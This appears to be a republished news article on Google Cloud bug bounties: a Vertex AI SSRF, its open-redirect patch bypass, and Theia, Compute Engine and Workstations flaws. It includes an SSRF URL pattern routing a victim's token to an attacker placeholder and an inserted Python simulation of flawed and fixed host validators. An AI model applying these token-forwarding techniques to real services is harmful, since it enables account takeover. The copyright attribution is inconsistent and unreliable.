
Google pays hacker duo $22k in bug bounties for flaws in multiple cloud projects

Vulnerabilities in four Google Cloud Platform (GCP) projects have earned a pair of security researchers more than $22,000 in bug bounties.

The most lucrative project for hacker duo Sreeram KL and Sivanesh Ashok was Vertex AI, Google's machine learning training and deployment platform, which netted them a pair of $5,000 payouts: one for a server-side request forgery (SSRF) bug and one for a subsequent bypass of the patch.

Documented in a blog post by Sreeram, the flaw resided in Vertex AI’s workbench feature, which enables the creation of Jupyter notebook-based development environments on the cloud.

By abusing the SSRF vulnerability and duping a victim into clicking a malicious URL, an attacker could capture the victim's authorization token and, with it, take over all of the victim's GCP projects, as the researchers demonstrated in a proof-of-concept video.

SSRF bug

When the researchers found a URL that seemed to offer scope for SSRF, “requesting the original URL resulted in a response that looked like the output of an authenticated request sent to compute.googleapis.com,” said Sreeram. “From previous experience, I know these endpoints use the authorization header for credentials.”

The proxy endpoint was supposed to forward requests only to compute.googleapis.com, but fuzzing surfaced a URL – https://{INSTANCE-ID}-dot-us-central1.notebooks.googleusercontent.com/aipn/v2/proxy/{attacker.com}/compute.googleapis.com/ – that bypassed the endpoint's domain verification, said Sreeram. “Furthermore, the vulnerable endpoint was a GET request with no CSRF protection (pretty common),” said Sreeram.

As for finding attack targets, the instance-specific subdomain a victim's workbench uses is readily ascertained: the researchers found that these subdomains leak to several third-party domains, such as github.com, “via referer in the general application flow”.

Google addressed the issue by adding cross-site request forgery (CSRF) protection to the GET endpoints and improving verification of the domain.

Patch bypass

After the fix was rolled out, however, Sreeram and Ashok noticed that changing compute.googleapis.com to something.google.com in the proxy URL no longer triggered an error as it had before the fix, meaning the new domain check still trusted any host under google.com.

Circumventing the fix therefore only required an open redirect on a *.google.com host, they surmised.

JavaScript-based redirections were not an option, since the server fetching the target did not execute JavaScript, so they needed a server-side HTTP redirect. They found one in FeedBurner, Google's web feed management service: when a user deactivates the proxy for a feed, the service answers requests for the feed with a redirect to the user's own domain rather than proxying the RSS feed. Pointing the proxy at such a feed therefore made it forward the authenticated request to an attacker-controlled host.

The exploit chain concluded with a bypass of the newly added CSRF protection that leveraged a technique developed in 2020 by ‘@s1r1us’ against JupyterLab.

The second fix involved ending support for *.google.com as a proxy URL, restricting the proxy to the specific hosts it is meant to reach.
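To make the two weaknesses above concrete (the domain check that a path segment could satisfy, and the broadened *.google.com suffix check that an open redirect could abuse), here is an added illustration in Python. It is not the researchers' or Google's code: Google's actual validation logic is not public, so the three validators below are assumed models of the behaviour the article describes, the in-memory "network" is constructed test data, and the host name open-redirect.google.com is a hypothetical stand-in for the FeedBurner redirector (the page does not name the real host).

```python
"""
Added illustration (not the researchers' or Google's code): three generations
of the target check for a credential-attaching proxy endpoint of the form
/proxy/{target}/, run against a constructed in-memory "network" so that the
SSRF, the open-redirect patch bypass, and a hardened check can be compared.
"""
from urllib.parse import urlsplit

# Hosts the proxy is meant to reach with the user's Authorization header.
ALLOWED_HOSTS = {"compute.googleapis.com"}
REDIRECT_CODES = {301, 302, 303, 307, 308}


def check_substring(url: str) -> bool:
    """Assumed model of the original check: the allowed name merely has to
    appear somewhere in the string, so 'attacker.example/compute.googleapis.com/'
    passes because the allowed host sits in the *path*."""
    return "compute.googleapis.com" in url


def check_suffix(url: str) -> bool:
    """Assumed model of the first fix: the host is parsed properly, but any
    *.google.com / *.googleapis.com host is trusted, so one open redirect on
    any of those hosts forwards the authenticated request elsewhere."""
    host = urlsplit(url).hostname or ""
    return host.endswith(".google.com") or host.endswith(".googleapis.com")


def check_allowlist(url: str) -> bool:
    """Hardened check: exact match of the parsed host against a closed list."""
    return (urlsplit(url).hostname or "") in ALLOWED_HOSTS


# Constructed responses: host -> (status, Location header or None, body).
# open-redirect.google.com is hypothetical; it stands in for a *.google.com
# service that redirects to a user-supplied domain, as FeedBurner did.
FAKE_NET = {
    "compute.googleapis.com": (200, None, "authenticated instance list"),
    "open-redirect.google.com": (302, "https://attacker.example/collect", ""),
    "attacker.example": (200, None, "attacker endpoint"),
}


def fake_client(url: str):
    """In-memory stand-in for the proxy's outbound HTTP client."""
    return FAKE_NET.get(urlsplit(url).hostname or "", (404, None, ""))


def proxy_request(target: str, validator, revalidate_redirects: bool = False,
                  max_hops: int = 3) -> list:
    """Simulate the proxy: validate the target, then fetch it with the user's
    credential attached, following redirects. Returns the hosts that received
    the credential; an empty list means the request was refused up front.
    With revalidate_redirects=True every redirect hop is re-checked before the
    credential is sent on, which is what a safe proxy must do."""
    url = "https://" + target
    credential_sent_to = []
    for hop in range(max_hops):
        if (hop == 0 or revalidate_redirects) and not validator(url):
            break
        credential_sent_to.append(urlsplit(url).hostname or "")
        status, location, _body = fake_client(url)
        if status not in REDIRECT_CODES or not location:
            break
        url = location
    return credential_sent_to


if __name__ == "__main__":
    ssrf = "attacker.example/compute.googleapis.com/"
    bypass = "open-redirect.google.com/feed"
    print("substring check, SSRF target :", proxy_request(ssrf, check_substring))
    print("suffix check, SSRF target    :", proxy_request(ssrf, check_suffix))
    print("suffix check, redirect target:", proxy_request(bypass, check_suffix))
    print("suffix check + revalidation  :",
          proxy_request(bypass, check_suffix, revalidate_redirects=True))
    print("allowlist, redirect target   :", proxy_request(bypass, check_allowlist))
```

The two lessons the simulation makes visible: a host check must operate on the parsed host name, never on the raw string, and it must be repeated on every redirect hop, because a trusted host that redirects is just an open proxy to wherever it points. The exact allowlist is the version that survives both attacks; the suffix check with re-validation still sends the credential to the redirector itself, which is acceptable only if every *.google.com host is genuinely trusted with it.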

“While finding this issue, we gained insight into the workings of managed GCP products, which helped us find other bugs in GCP,” Sreeram told The Daily Swig.

Theia, Compute Engine, Workstations bugs

This included a second attack on the workbench feature, this time through Theia, the integrated development environment (IDE) that Google also uses in Cloud Shell, as disclosed in a separate blog post published by Sreeram.


Because user-managed instances ran as the project's default Compute Engine service account, the research duo was able to compromise the entire project: by exploiting a known XSS vulnerability in Theia (CVE-2021-41038), they could fetch the service account's access token from the instance metadata server. This earned the pair a further $3,133.70 bounty.

The first security flaw they found in GCP, as documented by Ashok, was an SSH key injection issue in Google Cloud’s Compute Engine.

Generating a $5,000 payout plus a $1,000 bounty bonus, the vulnerability resided in the SSH-in-browser function and could lead to remote code execution (RCE) on a victim's Compute Engine instance, as demonstrated in the researchers' proof-of-concept video.

The researchers also earned a further $3,133.70 for an authorization bypass in Cloud Workstations, which provides fully managed development environments for security-sensitive enterprises. Ashok outlined this find in a fourth blog post.

The pair earned a total of $22,267 from six separate bug bounty payouts.

The Daily Swig has invited Google to comment on these vulnerabilities but has not yet received a response. We'll update the article should that change.

Copyright 2021 Associated Press. All rights reserved.

Source: https://portswigger.net/daily-swig/google-pays-hacker-duo-22k-in-bug-bounties-for-flaws-in-multiple-cloud-projects


Copyright © 2023 Hard News Herd Hitting in Your Face News Source | World News | Breaking News | US News | Political News Website by Top Search SEO